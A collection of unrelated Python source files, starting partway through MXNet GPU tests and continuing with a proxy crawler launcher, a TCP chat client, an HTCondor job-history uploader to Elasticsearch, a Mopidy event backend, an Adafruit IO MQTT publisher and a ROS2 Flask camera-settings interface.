std = mx.nd.random.normal(shape=(C)).as_in_context(ctx)
x.attach_grad()
with autograd.record(False):
y = mx.ndarray.BatchNorm(x, gamma, beta, mean, std.square(),
fix_gamma=False, cudnn_off=cudnn_o)
loss=y.square().sum()
loss.backward(train_mode=False)
@with_seed()
def test_create_sparse_ndarray_gpu_to_cpu():
dim0 = 10
dim1 = 5
densities = [0, 0.5, 1]
for density in densities:
shape = rand_shape_2d(dim0, dim1)
matrix = rand_ndarray(shape, 'row_sparse', density)
data = matrix.data
indices = matrix.indices
rsp_created = mx.nd.sparse.row_sparse_array((data, indices), shape=shape, ctx=mx.cpu())
assert rsp_created.stype == 'row_sparse'
assert same(rsp_created.data.asnumpy(), data.asnumpy())
assert same(rsp_created.indices.asnumpy(), indices.asnumpy())
rsp_copy = mx.nd.array(rsp_created)
assert(same(rsp_copy.asnumpy(), rsp_created.asnumpy()))
@with_seed()
def test_softmax_activation():
gpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.gpu(0))
cpu_a = mx.nd.array([[3., 0.5, -0.5, 2., 7.],
[2., -.4, 7., 3., 0.2]], ctx=mx.cpu())
cpu_a.attach_grad()
gpu_a.attach_grad()
with mx.autograd.record():
gpu_y = mx.nd.SoftmaxActivation(data = gpu_a)
cpu_y = mx.nd.SoftmaxActivation(data = cpu_a)
assert_almost_equal(cpu_y.asnumpy(), gpu_y.asnumpy(), atol = 1e-3, rtol = 1e-3)
gpu_y.backward()
cpu_y.backward()
assert_almost_equal(cpu_a.grad.asnumpy(), gpu_a.grad.asnumpy(),
atol = 1e-3, rtol = 1e-3)
def test_context_num_gpus():
# Test that num_gpus reports at least one GPU, as the test is run on a GPU host.
assert mx.context.num_gpus() > 0
if __name__ == '__main__':
import nose
nose.runmodule()
|
proxy_crawler.py
|
#! /usr/bin/python3
# rootVIII | proxy_crawler.py
from sys import exit
from threading import Thread
from crawler.crawl import ProxyCrawler, HeadlessProxyCrawler
from crawler.arguments import ArgParser
def main():
while True:
if not args.headless:
bot = ProxyCrawler(args.url, args.keyword)
else:
bot = HeadlessProxyCrawler(args.url, args.keyword)
bot.start_search()
if __name__ == "__main__":
args = ArgParser().get_args()
if 'https://' not in args.url:
print('Include protocol in URL: https://')
exit(1)
try:
thread = Thread(target=main)
thread.daemon = True
thread.start()
thread.join()
except KeyboardInterrupt:
print('\nExiting\n')
|
client.py
|
import socket, threading, traceback, queue, json
from datetime import datetime
from chatapp.shared import message
class TCP_Nonblocking_Client:
def __init__(self, host, port, username, password, verbose_output=True):
self.host = host
self.port = port
self.sock = None
self.format = 'utf-8'
self.verbose_output = verbose_output
self.username = username
self.password = password
self.received_messages = queue.Queue()
def print_tstamp(self, msg):
if self.verbose_output:
current_time = datetime.now().strftime("%Y-%M-%d %H:%M:%S")
print(f'[{current_time}] [CLIENT] {msg}')
def create_socket(self):
self.print_tstamp('Creating socket...')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.print_tstamp(f'Socket created')
def connect_to_server(self, should_signup):
# returns True/False if successfully connected, along with message to be displayed by ui incase something goes wrong
try:
self.print_tstamp(f'Connecting to server [{self.host}] on port [{self.port}]...')
self.sock.connect((self.host, self.port))
self.print_tstamp(f'Connected to server [{self.host}] on port [{self.port}]')
if should_signup:
signup_response = self.send_signup(self.username, self.password)
self.print_tstamp('Verifying username and password with server...')
verification_response = self.send_verification(self.username, self.password)
if verification_response['success']:
self.print_tstamp('Username and password verified with server')
return True, ''
else:
self.print_tstamp('Username and/or password could not be verified by server')
self.shutdown_socket()
return False, 'Username and/or password could not be verified by server'
except socket.error:
self.print_tstamp('Encountered an error:')
traceback.print_exc()
return False, 'Encountered a socket error'
except OSError as err:
self.print_tstamp('Encountered an error:')
traceback.print_exc()
return False, 'Encountered an OSError'
def send_verification(self, username, password):
# attempts to verify username, password with server; returns response from server or false if response from server was incorrectly formatted
msg = message.create_message(message.config_msg_types['VERIFICATION_REQUEST'], username=username, password=password)
msg = json.dumps(msg)
msg = msg.encode(self.format)
self.sock.send(msg)
response = self.sock.recv(128)
response = response.decode(self.format)
response = json.loads(response)
if message.is_type(response, message.config_msg_types['VERIFICATION_RESPONSE']):
return response
return False
def send_signup(self, username, password):
# attempts to signup new user with username, password
msg = message.create_message(message.config_msg_types['SIGNUP_REQUEST'], username=username, password=password)
msg = json.dumps(msg)
msg = msg.encode(self.format)
self.sock.send(msg)
response = self.sock.recv(128)
response = response.decode(self.format)
response = json.loads(response)
if message.is_type(response, message.config_msg_types['SIGNUP_RESPONSE']):
return response
return False
def send_message(self, msg):
try:
if msg:
msg = message.create_message(message.config_msg_types['CLIENT_TEXT'], msg_body=msg)
msg = json.dumps(msg) # convert python dict to json string
msg = msg.encode(self.format) # convert json string to utf-8 bytes
send_info = self.sock.send(msg) # send json string encoded with utf-8
self.print_tstamp(f'Sent {send_info} bytes to the server')
return True, ''
except OSError as err:
self.print_tstamp('Encountered an error:')
traceback.print_exc()
return False, 'Encountered an OSError'
def shutdown_socket(self):
self.print_tstamp('Closing socket...')
self.sock.close()
self.print_tstamp('Socket closed')
def read_message_loop(self):
# if function returns value then error has occured and interaction should be halted
while True:
try:
msg = self.sock.recv(1024) # receive json string encoded with utf-8 from server
msg = msg.decode(self.format) # decode msg from utf-8 bytes to json string
msg = json.loads(msg) # decode json string to python dict
except socket.timeout:
self.print_tstamp('Socket timed out, retrying receive')
continue
except json.JSONDecodeError:
self.print_tstamp('Encountered error: ')
traceback.print_exc()
except:
self.print_tstamp('Encountered socket error:')
traceback.print_exc()
break
if msg == '':
# connection closed by peer, exit loop
self.print_tstamp('Connection closed by server')
break
self.print_tstamp(f'Received from [SERVER]: {msg}')
self.received_messages.put(msg)
self.shutdown_socket()
self.stop_client = True
def run_client():
try:
print('Signup then login? [y/n]')
is_signup = input()
is_signup.lower()
if is_signup == 'y':
is_signup = True
else:
is_signup = False
print('Username: ')
username = input()
print('Password: ')
password = input()
tcp_client = TCP_Nonblocking_Client('localhost', 8080, username, password, True)
tcp_client.create_socket()
tcp_client.connect_to_server(is_signup)
thread = threading.Thread(target=tcp_client.read_message_loop)
thread.daemon = True
thread.start()
while True:
message = input()
tcp_client.send_message(message)
except KeyboardInterrupt:
pass
if __name__ == '__main__':
run_client()
|
history.py
|
# Copyright 2021 HTCondor Team, Computer Sciences Department,
# University of Wisconsin-Madison, WI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
import logging
import datetime
import traceback
import multiprocessing
import htcondor
import elasticsearch
from . import elastic, utils, convert
_LAUNCH_TIME = int(time.time())
# Lower the volume on third-party packages
for k in logging.Logger.manager.loggerDict:
logging.getLogger(k).setLevel(logging.WARNING)
def process_custom_ads(start_time, job_ad_file, args, metadata=None):
"""
Given an iterator of ads, process its entire set of history
"""
logging.info(f"Start processing the adfile: {job_ad_file}")
my_start = time.time()
buffered_ads = {}
count = 0
total_upload = 0
if not args.read_only:
es = elastic.get_server_handle(args)
try:
for job_ad in utils.parse_history_ad_file(job_ad_file):
metadata = metadata or {}
metadata["condor_history_source"] = "custom"
metadata["condor_history_runtime"] = int(my_start)
metadata["condor_history_host_version"] = job_ad.get("CondorVersion", "UNKNOWN")
metadata["condor_history_host_platform"] = job_ad.get(
"CondorPlatform", "UNKNOWN"
)
metadata["condor_history_host_machine"] = job_ad.get("Machine", "UNKNOWN")
metadata["condor_history_host_name"] = job_ad.get("Name", "UNKNOWN")
try:
dict_ad = convert.to_json(job_ad, return_dict=True)
except Exception as e:
message = f"Failure when converting document in {job_ad_file}: {e}"
exc = traceback.format_exc()
message += f"\n{exc}"
logging.warning(message)
continue
idx = elastic.get_index(args.es_index_name)
ad_list = buffered_ads.setdefault(idx, [])
ad_list.append((convert.unique_doc_id(dict_ad), dict_ad))
if len(ad_list) == args.es_bunch_size:
st = time.time()
if not args.read_only:
elastic.post_ads(
es.handle, idx, ad_list, metadata=metadata
)
logging.debug(
f"Posting {len(ad_list)} ads from {job_ad_file}"
)
total_upload += time.time() - st
buffered_ads[idx] = []
count += 1
except Exception:
message = f"Failure when processing history from {job_ad_file}"
logging.exception(message)
return
# Post the remaining ads
for idx, ad_list in list(buffered_ads.items()):
if ad_list:
logging.debug(
f"Posting remaining {len(ad_list)} ads from {job_ad_file}"
)
if not args.read_only:
elastic.post_ads(es.handle, idx, ad_list, metadata=metadata)
total_time = (time.time() - my_start) / 60.0
total_upload /= 60.0
logging.info(
f"{job_ad_file} history: response count: {count}; upload time {total_upload:.2f} min"
)
return
def process_schedd(start_time, since, checkpoint_queue, schedd_ad, args, metadata=None):
"""
Given a schedd, process its entire set of history since last checkpoint.
"""
logging.info(f"Start processing the scheduler: {schedd_ad['Name']}")
my_start = time.time()
metadata = metadata or {}
metadata["condor_history_source"] = "schedd"
metadata["condor_history_runtime"] = int(my_start)
metadata["condor_history_host_version"] = schedd_ad.get("CondorVersion", "UNKNOWN")
metadata["condor_history_host_platform"] = schedd_ad.get(
"CondorPlatform", "UNKNOWN"
)
metadata["condor_history_host_machine"] = schedd_ad.get("Machine", "UNKNOWN")
metadata["condor_history_host_name"] = schedd_ad.get("Name", "UNKNOWN")
last_completion = since["EnteredCurrentStatus"]
since_str = (
f"""(ClusterId == {since['ClusterId']}) && (ProcId == {since['ProcId']})"""
)
schedd = htcondor.Schedd(schedd_ad)
max_ads = args.schedd_history_max_ads # specify number of history entries to read
if max_ads > 10000:
logging.debug(f"Please note that the maximum number of queries per scheduler is also limited by the scheduler's config (HISTORY_HELPER_MAX_HISTORY).")
logging.info(f"Note that a too large number of schedd_history_max_ads can cause condor_adstash to break!")
logging.info(f"Querying {schedd_ad['Name']} for history ads since: {since_str}")
buffered_ads = {}
count = 0
total_upload = 0
timed_out = False
if not args.read_only:
es = elastic.get_server_handle(args)
try:
if not args.dry_run:
history_iter = schedd.history(
constraint="true",
projection=[],
match=max_ads, # default=10000
since=since_str
)
else:
history_iter = []
for job_ad in history_iter:
try:
dict_ad = convert.to_json(job_ad, return_dict=True)
except Exception as e:
message = f"Failure when converting document on {schedd_ad['Name']} history: {e}"
exc = traceback.format_exc()
message += f"\n{exc}"
logging.warning(message)
continue
idx = elastic.get_index(args.es_index_name)
ad_list = buffered_ads.setdefault(idx, [])
ad_list.append((convert.unique_doc_id(dict_ad), dict_ad))
if len(ad_list) == args.es_bunch_size:
st = time.time()
if not args.read_only:
elastic.post_ads(
es.handle, idx, ad_list, metadata=metadata
)
logging.debug(
f"Posting {len(ad_list)} ads from {schedd_ad['Name']} (process_schedd)"
)
total_upload += time.time() - st
buffered_ads[idx] = []
count += 1
# Find the most recent job and use its job id as the since parameter
job_completion = convert.record_time(job_ad, fallback_to_launch=False)
if job_completion > last_completion:
last_completion = job_completion
since = {
"ClusterId": job_ad.get("ClusterId", 0),
"ProcId": job_ad.get("ProcId", 0),
"EnteredCurrentStatus": job_completion,
}
if utils.time_remaining(my_start, args.schedd_history_timeout) <= 0:
message = f"History crawler on {schedd_ad['Name']} has been running for more than {args.schedd_history_timeout} seconds; pushing last ads and exiting."
logging.error(message)
timed_out = True
break
except RuntimeError:
message = f"Failed to query schedd {schedd_ad['Name']} for job history"
logging.exception(message)
return since
except Exception:
message = f"Failure when processing schedd history query on {schedd_ad['Name']}"
logging.exception(message)
return since
# Post the remaining ads
for idx, ad_list in list(buffered_ads.items()):
if ad_list:
logging.debug(
f"Posting remaining {len(ad_list)} ads from {schedd_ad['Name']} (process_schedd)"
)
if not args.read_only:
elastic.post_ads(es.handle, idx, ad_list, metadata=metadata)
total_time = (time.time() - my_start) / 60.0
total_upload /= 60.0
last_formatted = datetime.datetime.fromtimestamp(last_completion).strftime(
"%Y-%m-%d %H:%M:%S"
)
logging.info(
f"Schedd {schedd_ad['Name']} history: response count: {count}; last job {last_formatted}; query time {total_time - total_upload:.2f} min; upload time {total_upload:.2f} min"
)
if count >= max_ads:
logging.warning(
f"Max ads ({max_ads}) was reached "
f"for {schedd_ad['Name']}, older history may be missing!"
)
# If we got to this point without a timeout, all these jobs have
# been processed and uploaded, so we can update the checkpoint
if not timed_out:
checkpoint_queue.put((schedd_ad["Name"], since))
return since
def process_startd(start_time, since, checkpoint_queue, startd_ad, args, metadata=None):
"""
Given a startd, process its entire set of history since last checkpoint.
"""
my_start = time.time()
metadata = metadata or {}
metadata["condor_history_source"] = "startd"
metadata["condor_history_runtime"] = int(my_start)
metadata["condor_history_host_version"] = startd_ad.get("CondorVersion", "UNKNOWN")
metadata["condor_history_host_platform"] = startd_ad.get(
"CondorPlatform", "UNKNOWN"
)
metadata["condor_history_host_machine"] = startd_ad.get("Machine", "UNKNOWN")
metadata["condor_history_host_name"] = startd_ad.get("Name", "UNKNOWN")
last_completion = since["EnteredCurrentStatus"]
since_str = f"""(GlobalJobId == "{since['GlobalJobId']}") && (EnteredCurrentStatus == {since['EnteredCurrentStatus']})"""
max_ads = args.startd_history_max_ads # specify number of history entries to read
if max_ads > 10000:
logging.debug(f"Please note that the maximum number of queries per scheduler is also limited by the scheduler's config (HISTORY_HELPER_MAX_HISTORY).")
logging.info(f"Note that a too large number of startd_history_max_ads can cause condor_adstash to break!")
startd = htcondor.Startd(startd_ad)
logging.info(f"Querying {startd_ad['Machine']} for history since: {since_str}")
buffered_ads = {}
count = 0
total_upload = 0
timed_out = False
if not args.read_only:
es = elastic.get_server_handle(args)
try:
if not args.dry_run:
history_iter = startd.history(
requirements="true",
projection=[],
match=max_ads, # default=10000
since=since_str
)
else:
history_iter = []
for job_ad in history_iter:
try:
dict_ad = convert.to_json(job_ad, return_dict=True)
except Exception as e:
message = f"Failure when converting document on {startd_ad['Machine']} history: {e}"
exc = traceback.format_exc()
message += f"\n{exc}"
logging.warning(message)
continue
idx = elastic.get_index(args.es_index_name)
ad_list = buffered_ads.setdefault(idx, [])
ad_list.append((convert.unique_doc_id(dict_ad), dict_ad))
if len(ad_list) == args.es_bunch_size:
st = time.time()
if not args.read_only:
elastic.post_ads(
es.handle, idx, ad_list, metadata=metadata
)
logging.debug(
f"Posting {len(ad_list)} ads from {startd_ad['Machine']} (process_startd)"
)
total_upload += time.time() - st
buffered_ads[idx] = []
count += 1
job_completion = job_ad.get("EnteredCurrentStatus")
if job_completion > last_completion:
last_completion = job_completion
since = {
"GlobalJobId": job_ad.get("GlobalJobId"),
"EnteredCurrentStatus": job_ad.get("EnteredCurrentStatus"),
}
if utils.time_remaining(my_start, args.startd_history_timeout) <= 0:
message = f"History crawler on {startd_ad['Machine']} has been running for more than {args.schedd_history_timeout} seconds; pushing last ads and exiting."
logging.error(message)
timed_out = True
break
except RuntimeError:
message = f"Failed to query startd {startd_ad['Machine']} for job history"
logging.exception(message)
return since
except Exception:
message = f"Failure when processing startd history query on {startd_ad['Machine']}"
logging.exception(message)
return since
# Post the remaining ads
for idx, ad_list in list(buffered_ads.items()):
if ad_list:
logging.debug(
f"Posting remaining {len(ad_list)} ads from {startd_ad['Machine']} (process_startd)"
)
if not args.read_only:
elastic.post_ads(es.handle, idx, ad_list, metadata=metadata)
total_time = (time.time() - my_start) / 60.0
total_upload /= 60.0
last_formatted = datetime.datetime.fromtimestamp(last_completion).strftime(
"%Y-%m-%d %H:%M:%S"
)
logging.info(
f"Startd {startd_ad['Machine']} history: response count: {count}; last job {last_formatted}; query time {total_time - total_upload:.2f} min; upload time {total_upload:.2f} min"
)
if count >= max_ads:
logging.warning(
f"Max ads ({max_ads}) was reached "
f"for {startd_ad['Machine']}, some history may be missing!"
)
# If we got to this point without a timeout, all these jobs have
# been processed and uploaded, so we can update the checkpoint
if not timed_out:
checkpoint_queue.put((startd_ad["Machine"], since))
return since
def load_checkpoint(checkpoint_file):
try:
with open(checkpoint_file, "r") as fd:
checkpoint = json.load(fd)
except IOError:
checkpoint = {}
return checkpoint
def update_checkpoint(checkpoint_file, name, since):
checkpoint = load_checkpoint(checkpoint_file)
checkpoint[name] = since
with open(checkpoint_file, "w") as fd:
json.dump(checkpoint, fd, indent=4)
def process_histories(
schedd_ads=[], startd_ads=[], starttime=None, pool=None, args=None, metadata=None
):
"""
Process history files for each schedd listed in a given
multiprocessing pool
"""
checkpoint = load_checkpoint(args.checkpoint_file)
timeout = 2 * 60
futures = []
metadata = metadata or {}
metadata["es_push_source"] = "condor_history"
manager = multiprocessing.Manager()
checkpoint_queue = manager.Queue()
if len(schedd_ads) > 0:
timeout = args.schedd_history_timeout
for schedd_ad in schedd_ads:
name = schedd_ad["Name"]
# Check for last completion time
# If there was no previous completion, get full history
since = checkpoint.get(
name, {"ClusterId": 0, "ProcId": 0, "EnteredCurrentStatus": 0}
)
future = pool.apply_async(
process_schedd,
(starttime, since, checkpoint_queue, schedd_ad, args, metadata),
)
futures.append((name, future))
if len(startd_ads) > 0:
timeout = args.startd_history_timeout
for startd_ad in startd_ads:
machine = startd_ad["Machine"]
# Check for last completion time ("since")
since = checkpoint.get(
machine, {"GlobalJobId": "Unknown", "EnteredCurrentStatus": 0}
)
future = pool.apply_async(
process_startd,
(starttime, since, checkpoint_queue, startd_ad, args, metadata),
)
futures.append((machine, future))
def _chkp_updater():
while True:
try:
job = checkpoint_queue.get()
if job is None: # Swallow poison pill
break
except EOFError as error:
logging.warning(
"EOFError - Nothing to consume left in the queue %s", error
)
break
update_checkpoint(args.checkpoint_file, *job)
chkp_updater = multiprocessing.Process(target=_chkp_updater)
chkp_updater.start()
# Report processes if they timeout or error
for name, future in futures:
try:
future.get(timeout)
except multiprocessing.TimeoutError:
# This implies that the checkpoint hasn't been updated
message = f"Daemon {name} history timed out; ignoring progress."
logging.warning(message)
except elasticsearch.exceptions.TransportError:
message = f"Transport error while sending history data of {name}; ignoring progress."
logging.exception(message)
except Exception:
message = f"Error getting progress from {name}."
logging.exception(message)
checkpoint_queue.put(None) # Send a poison pill
chkp_updater.join()
logging.warning(
f"Processing time for history: {((time.time() - starttime) / 60.0)} mins"
)
|
mopidy.py
|
import json
import re
import threading
from platypush.backend import Backend
from platypush.message.event.music import MusicPlayEvent, MusicPauseEvent, \
MusicStopEvent, NewPlayingTrackEvent, PlaylistChangeEvent, VolumeChangeEvent, \
PlaybackConsumeModeChangeEvent, PlaybackSingleModeChangeEvent, \
PlaybackRepeatModeChangeEvent, PlaybackRandomModeChangeEvent, \
MuteChangeEvent, SeekChangeEvent
# noinspection PyUnusedLocal
class MusicMopidyBackend(Backend):
"""
This backend listens for events on a Mopidy music server streaming port.
Since this backend leverages the Mopidy websocket interface it is only
compatible with Mopidy and not with other MPD servers. Please use the
:class:`platypush.backend.music.mpd.MusicMpdBackend` for a similar polling
solution if you're not running Mopidy or your instance has the websocket
interface or web port disabled.
Triggers:
* :class:`platypush.message.event.music.MusicPlayEvent` if the playback state changed to play
* :class:`platypush.message.event.music.MusicPauseEvent` if the playback state changed to pause
* :class:`platypush.message.event.music.MusicStopEvent` if the playback state changed to stop
* :class:`platypush.message.event.music.NewPlayingTrackEvent` if a new track is being played
* :class:`platypush.message.event.music.PlaylistChangeEvent` if the main playlist has changed
* :class:`platypush.message.event.music.VolumeChangeEvent` if the main volume has changed
* :class:`platypush.message.event.music.MuteChangeEvent` if the mute status has changed
* :class:`platypush.message.event.music.SeekChangeEvent` if a track seek event occurs
Requires:
* **websocket-client** (``pip install websocket-client``)
* Mopidy installed and the HTTP service enabled
"""
def __init__(self, host='localhost', port=6680, **kwargs):
super().__init__(**kwargs)
self.host = host
self.port = int(port)
self.url = 'ws://{}:{}/mopidy/ws'.format(host, port)
self._msg_id = 0
self._ws = None
self._latest_status = {}
self._reconnect_thread = None
self._connected_event = threading.Event()
try:
self._latest_status = self._get_tracklist_status()
except Exception as e:
self.logger.warning('Unable to get mopidy status: {}'.format(str(e)))
@staticmethod
def _parse_track(track, pos=None):
if not track:
return {}
conv_track = track.get('track', {}).copy()
conv_track['id'] = track.get('tlid')
conv_track['file'] = conv_track['uri']
del conv_track['uri']
if 'artists' in conv_track:
conv_track['artist'] = conv_track['artists'][0].get('name')
del conv_track['artists']
if 'name' in conv_track:
conv_track['title'] = conv_track['name']
del conv_track['name']
if 'album' in conv_track:
conv_track['album'] = conv_track['album']['name']
if 'length' in conv_track:
conv_track['time'] = conv_track['length']/1000 \
if conv_track['length'] else conv_track['length']
del conv_track['length']
if pos is not None:
conv_track['pos'] = pos
if '__model__' in conv_track:
del conv_track['__model__']
return conv_track
def _communicate(self, msg):
import websocket
if isinstance(msg, str):
msg = json.loads(msg)
self._msg_id += 1
msg['jsonrpc'] = '2.0'
msg['id'] = self._msg_id
msg = json.dumps(msg)
ws = websocket.create_connection(self.url)
ws.send(msg)
response = json.loads(ws.recv()).get('result')
ws.close()
return response
def _get_tracklist_status(self):
return {
'repeat': self._communicate({
'method': 'core.tracklist.get_repeat'}),
'random': self._communicate({
'method': 'core.tracklist.get_random'}),
'single': self._communicate({
'method': 'core.tracklist.get_single'}),
'consume': self._communicate({
'method': 'core.tracklist.get_consume'}),
}
def _on_msg(self):
def hndl(ws, msg):
msg = json.loads(msg)
event = msg.get('event')
if not event:
return
status = {}
track = msg.get('tl_track', {})
if event == 'track_playback_paused':
status['state'] = 'pause'
track = self._parse_track(track)
if not track:
return
self.bus.post(MusicPauseEvent(status=status, track=track))
elif event == 'track_playback_resumed':
status['state'] = 'play'
track = self._parse_track(track)
if not track:
return
self.bus.post(MusicPlayEvent(status=status, track=track))
elif event == 'track_playback_ended' or (
event == 'playback_state_changed'
and msg.get('new_state') == 'stopped'):
status['state'] = 'stop'
track = self._parse_track(track)
self.bus.post(MusicStopEvent(status=status, track=track))
elif event == 'track_playback_started':
track = self._parse_track(track)
if not track:
return
status['state'] = 'play'
status['position'] = 0.0
status['time'] = track.get('time')
self.bus.post(NewPlayingTrackEvent(status=status, track=track))
elif event == 'stream_title_changed':
m = re.match('^\s*(.+?)\s+-\s+(.*)\s*$', msg.get('title', ''))
if not m:
return
track['artist'] = m.group(1)
track['title'] = m.group(2)
status['state'] = 'play'
status['position'] = 0.0
self.bus.post(NewPlayingTrackEvent(status=status, track=track))
elif event == 'volume_changed':
status['volume'] = msg.get('volume')
self.bus.post(VolumeChangeEvent(volume=status['volume'],
status=status, track=track))
elif event == 'mute_changed':
status['mute'] = msg.get('mute')
self.bus.post(MuteChangeEvent(mute=status['mute'],
status=status, track=track))
elif event == 'seeked':
status['position'] = msg.get('time_position')/1000
self.bus.post(SeekChangeEvent(position=status['position'],
status=status, track=track))
elif event == 'tracklist_changed':
tracklist = [self._parse_track(t, pos=i)
for i, t in enumerate(self._communicate({
'method': 'core.tracklist.get_tl_tracks'}))]
self.bus.post(PlaylistChangeEvent(changes=tracklist))
elif event == 'options_changed':
new_status = self._get_tracklist_status()
if new_status['random'] != self._latest_status.get('random'):
self.bus.post(PlaybackRandomModeChangeEvent(state=new_status['random']))
if new_status['repeat'] != self._latest_status['repeat']:
self.bus.post(PlaybackRepeatModeChangeEvent(state=new_status['repeat']))
if new_status['single'] != self._latest_status['single']:
self.bus.post(PlaybackSingleModeChangeEvent(state=new_status['single']))
if new_status['consume'] != self._latest_status['consume']:
self.bus.post(PlaybackConsumeModeChangeEvent(state=new_status['consume']))
self._latest_status = new_status
return hndl
def _retry_connect(self):
def reconnect():
while not self.should_stop() and not self._connected_event.is_set():
try:
self._connect()
except Exception as e:
self.logger.warning('Error on websocket reconnection: '.format(str(e)))
self._connected_event.wait(timeout=10)
self._reconnect_thread = None
if not self._reconnect_thread or not self._reconnect_thread.is_alive():
self._reconnect_thread = threading.Thread(target=reconnect)
self._reconnect_thread.start()
def _on_error(self):
def hndl(ws, error):
self.logger.warning('Mopidy websocket error: {}'.format(error))
ws.close()
return hndl
def _on_close(self):
def hndl(ws):
self._connected_event.clear()
self._ws = None
self.logger.warning('Mopidy websocket connection closed')
self._retry_connect()
return hndl
def _on_open(self):
def hndl(ws):
self._connected_event.set()
self.logger.info('Mopidy websocket connected')
return hndl
def _connect(self):
import websocket
if not self._ws:
self._ws = websocket.WebSocketApp(self.url,
on_open=self._on_open(),
on_message=self._on_msg(),
on_error=self._on_error(),
on_close=self._on_close())
self._ws.run_forever()
def run(self):
super().run()
self.logger.info('Started tracking Mopidy events backend on {}:{}'.format(self.host, self.port))
self._connect()
# vim:sw=4:ts=4:et:
|
send data to feed with paho-mqtt publish.py
|
# Import standard python modules
import threading
import time
import os
import sys
# Import paho MQTT client.
import paho.mqtt.client as mqtt
# "global" Vars
if(len(sys.argv)!=4):
sys.stderr.write('Usage: "{0}" $AdafruitIOUsername $AdafruitIOKey $AdafruitIOFeedKey\n'.format(sys.argv[0]))
os._exit(1)
AdafruitIOFeedUsername=sys.argv[1]
AdafruitIOKey=sys.argv[2]# Beware, your Key is Secret!
AdafruitIOFeedKey=sys.argv[3]# Complete Feed key where data receive
# Define callback functions which will be called when certain events happen.
def on_connect(client, userdata, flags, rc):
# Connected function will be called when the client connects.
print("Conectado con codigo resultante: "+str(rc))
client.connectedFlag=True
def on_disconnect(client):
# Disconnected function will be called when the client disconnects.
print("¡Se ha Desconectado!")
os._exit(1)
# Define Functions for Threading
def send_message(client):
while True:
if(client.messageSend is not None):
# publish topic $username/feeds/$groupKey.$feedKey
client.publish(AdafruitIOFeedUsername+"/feeds/"+AdafruitIOFeedKey, client.messageSend)
time.sleep(10)
if __name__ == "__main__":
# Setup an MQTT Client Instance
client = mqtt.Client()
# Setup Callbacks
client.on_connect = on_connect
client.on_disconnect=on_disconnect
# Setup Control Vars
client.connectedFlag=False
client.messageSend="0"
# Setup Credentials
client.username_pw_set(username=AdafruitIOFeedUsername, password=AdafruitIOKey)
# Connect to the Broker server.
print("Conectando al broker")
client.connect(host="io.adafruit.com", port=1883, keepalive=60)
client.loop_start()
while not client.connectedFlag:
print("Esperando conexión")
time.sleep(1)
# Setup Threading, to publish message every 10 seconds
hilo0=threading.Thread(target=send_message, args=(client,))
hilo0.start()
# Mod publish value
while client.messageSend!="x":# char 'x' to exit
client.messageSend=input("Nuevo valor para el tanque\n")
client.loop_stop()
client.disconnect()
os._exit(1)
|
nssc_web_interface.py
|
import os
from flask import Flask, render_template, request, redirect
from ament_index_python.packages import get_package_share_directory
import rclpy
from rclpy.node import Node
from std_msgs.msg import String
from nssc_interface.msg import ColorFilterParams, CameraSettings
import threading
from dataclasses import dataclass
package_share_directory = get_package_share_directory('nssc_web_interface')
print(package_share_directory)
template_dir = os.path.abspath(package_share_directory + '/templates')
app = Flask(__name__, template_folder=template_dir)
web_command_publisher = None
@dataclass
class FilterStruct:
low_h: int
low_s: int
low_v: int
high_h: int
high_s: int
high_v: int
dilation_element: int
dilation_size: int
enable_detection: bool
enable_ndi: bool
current_pos = FilterStruct(86, 94, 22, 125, 229, 131, 0, 2, True, True)
@dataclass
class CameraStruct:
gain: int
exposure: int
current_cam = CameraStruct(20, 30000)
class WebCommandPublisher(Node):
def __init__(self):
super().__init__('nssc_web_interface')
self.CFpublisher = self.create_publisher(ColorFilterParams, 'color_filter_params', 10)
self.CSpublisher = self.create_publisher(CameraSettings, 'camera_settings', 10)
def sendColorFilter(self, current_pos):
msg = ColorFilterParams()
msg.low_h = current_pos.low_h
msg.low_s = current_pos.low_s
msg.low_v = current_pos.low_v
msg.high_h = current_pos.high_h
msg.high_s = current_pos.high_s
msg.high_v = current_pos.high_v
msg.dilation_element = current_pos.dilation_element
msg.dilation_size = current_pos.dilation_size
msg.enable_detection = current_pos.enable_detection
msg.enable_ndi = current_pos.enable_ndi
self.CFpublisher.publish(msg)
self.get_logger().info('Publishing color filter settings')
def sendCameraSettings(self, current_cam):
msg = CameraSettings()
msg.gain = current_cam.gain
msg.exposure = current_cam.exposure
self.CSpublisher.publish(msg)
self.get_logger().info('Publishing camera settings')
@app.route('/')
def index():
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route("/send", methods=["POST", "GET"])
def send():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_pos.low_h = int(request.form["low_h"])
current_pos.low_s = int(request.form["low_s"])
current_pos.low_v = int(request.form["low_v"])
current_pos.high_h = int(request.form["high_h"])
current_pos.high_s = int(request.form["high_s"])
current_pos.high_v = int(request.form["high_v"])
current_pos.dilation_element = int(request.form["dilation_element"])
current_pos.dilation_size = int(request.form["dilation_size"])
web_command_publisher.sendColorFilter(current_pos)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/update', methods=['GET', 'POST'])
def update():
global current_pos
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/camera', methods=['GET', 'POST'])
def camera():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_cam.gain = int(request.form["gain"])
current_cam.exposure = int(request.form["exposure"])
web_command_publisher.sendCameraSettings(current_cam)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/detection', methods=['GET', 'POST'])
def detection():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_pos.enable_detection = not current_pos.enable_detection
web_command_publisher.sendColorFilter(current_pos)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
@app.route('/ndi', methods=['GET', 'POST'])
def ndi():
global web_command_publisher
global current_pos
global current_cam
if request.method == 'POST':
current_pos.enable_ndi = not current_pos.enable_ndi
web_command_publisher.sendColorFilter(current_pos)
return redirect('/')
else:
return render_template('index.html', current_pos=current_pos, current_cam=current_cam)
